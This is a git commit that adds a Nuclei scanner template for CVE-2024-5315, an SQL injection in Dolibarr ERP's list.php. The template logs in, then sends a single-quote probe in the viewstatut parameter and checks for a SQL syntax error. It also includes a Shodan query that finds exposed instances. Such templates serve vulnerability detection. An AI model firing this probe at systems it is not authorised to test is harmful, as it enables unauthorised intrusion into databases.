Merge pull request #10384 from projectdiscovery/CVE-2024-5315

Create CVE-2024-5315.yaml
main
pussycat0x 2024-07-25 18:32:52 +05:30 committed by GitHub
commit 25b93c84bf
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 59 additions and 0 deletions

View File

@ -0,0 +1,59 @@
id: CVE-2024-5315
info:
name: Dolibarr ERP CMS `list.php` - SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
impact: |
These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5315
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-5315
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09367
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Dolibarr"
tags: cve,cve2024,dolibarr,erp,sqli,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /htdocs/index.php?mainmenu=home HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginfunction=loginfunction&username={{username}}&password={{password}}
- |
GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- You have an error in your SQL syntax
- type: word
part: header_1
words:
- 'Set-Cookie: DOLSESSID_'
- type: word
part: body_1
words:
- SuperAdmin